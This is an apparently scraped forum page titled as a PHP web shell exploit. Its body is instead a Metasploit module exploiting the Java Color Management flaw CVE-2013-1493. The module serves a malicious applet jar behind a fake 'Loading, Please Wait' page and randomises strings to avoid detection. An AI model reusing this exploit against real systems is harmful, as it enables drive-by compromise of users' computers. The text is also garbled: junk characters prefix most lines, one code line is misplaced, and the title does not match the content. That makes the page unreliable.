STUNSHELL PHP Web Shell远程执行代码

admin

##

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
  M. Z6 f) n) f7 U* |##
2 }' h! C8 e, V% jrequire ‘msf/core’
1 A, |8 W: K( A* J% J( Srequire ‘rex’
$ d7 m$ l  j1 ?9 Z: hclass Metasploit3 < Msf::Exploit::Remote
& D7 a, n( J+ Q$ O, `5 gRank = NormalRanking
/ q2 f: ^+ [3 x& E7 minclude Msf::Exploit::Remote::HttpServer::HTML
, E( s3 U* _9 @( [/ P% Uinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
* d; m4 r3 {4 E5 D2 r2 t  T2 Gdef initialize( info = {} )
; K% I& G& ?7 c- osuper( update_info( info,
- Y" E* n6 a5 Q, |2 W" @‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
7 K; x- I; K, i/ B3 w4 x3 S1 B/ pand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
( p7 i* t2 X" `, d/ gsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
7 a; G# n3 ~% f' o4 Dwarning in order to run the malicious applet.
& C0 N7 O# L8 r% F$ h& V8 G3 z},
! B+ l; L4 j2 P' p1 F# b: C‘License’ => MSF_LICENSE,
& ], X; L2 i9 y. z‘Author’ =>
; _# ?0 B7 j8 H# T; Z( v'Unknown', # Vulnerability discovery and Exploit
8 M! B% Q' K5 T9 m* G'juan vazquez' # Metasploit module (just ported the published exploit)
],
‘References’ =>
[
[ 'CVE', '2013-1493' ],
) H0 V$ R: v+ V/ J3 U[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
9 C9 y# A2 Q! Q[ 'URL', 'http://pastie.org/pastes/6581034' ]
! J: U, U4 P; b! q],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
  y8 S1 d5 ~! G/ u9 h9 }9 l/ Z9 N‘Targets’ =>
[
3 _  _" y+ W7 D8 v[ 'Generic (Java Payload)',
: T5 }+ P/ w( `  E$ N/ [: x9 Z{
'Platform' => 'java',
8 j4 o* F, t! n- f. N'Arch' => ARCH_JAVA
}
& ^& D5 R7 }! Z! M& \],
0 m2 r! y/ \6 n+ P[ 'Windows x86 (Native Payload)',
% b, M% A9 M# `  p: J9 {2 g{
6 \0 x6 Q0 t6 |'Platform' => 'win',
'Arch' => ARCH_X86
8 ^" K6 I' f1 V. M# |' |$ L/ ^}
1 b* F8 I1 ~5 z1 z+ L! U, w' r]
6 U  d0 _; X( y; Y! B],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
  n. ]: F9 l* s8 Y$ _end
2 M( p& v# t/ s. m2 A" g& Z' Sdef setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
  O2 \% i6 A3 o3 N& t. [5 y; e2 m@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
4 t+ X5 I  T! L  t6 T" y@init_class.gsub!(“Init”, @init_class_name)
super
5 ]: Z" g3 p* ]& o1 e) aend
def on_request_uri(cli, request)
* i8 \+ h. k9 n* k( S  Y4 }6 jprint_status(“handling request for #{request.uri}”)
case request.uri
7 n. v' a7 w) g% d# X+ w% wwhen /\.jar$/i
* _; N; X, n+ t; h, g  sjar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
' T+ Q9 P% C1 l8 t9 J; o; _jar.add_file(“Leak.class”, @leak_class)
2 L! i  N/ ]& i1 xjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
3 F& c. u- ~  w  g; g( Z' U9 t& Xmetasploit_str = rand_text_alpha(“metasploit”.length)
" Z& e9 n1 ]7 e. q- s' h6 r, X, I" zpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
( h# y  `3 _2 Z+ S5 x4 \! x& T$ d& Wentry.name.gsub!(“Payload”, payload_str)
4 X4 m: b& L6 m5 uentry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
# H& m4 V, v2 C2 C2 Ysend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
4 Y* H2 y3 ~- V- E5 ppayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
send_not_found(cli)
return
/ U6 L% N3 g7 P6 i% cend
7 E; u  H) O1 v/ `4 s. Bsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
6 I( J# a* m7 }send_redirect(cli, get_resource() + ‘/’, ”)
0 B" s& d8 n+ z4 ~2 h& \end
1 ], a1 ?# l5 m# T8 ^! w- Uend
def generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
/ Y) h5 Z! P; P9 L3 K: v0 Khtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
* K& X, b) o/ ]- k$ qhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
+ B, w4 q8 d# x; R9 Khtml += %Q|</applet></body></html>|
& i! Q) `! f# N9 _+ ^. Ereturn html
- u* U4 B3 R$ s5 nend
0 H; f' g0 g% P' Aend
. y6 `) U& Y) g8 E4 N7 nend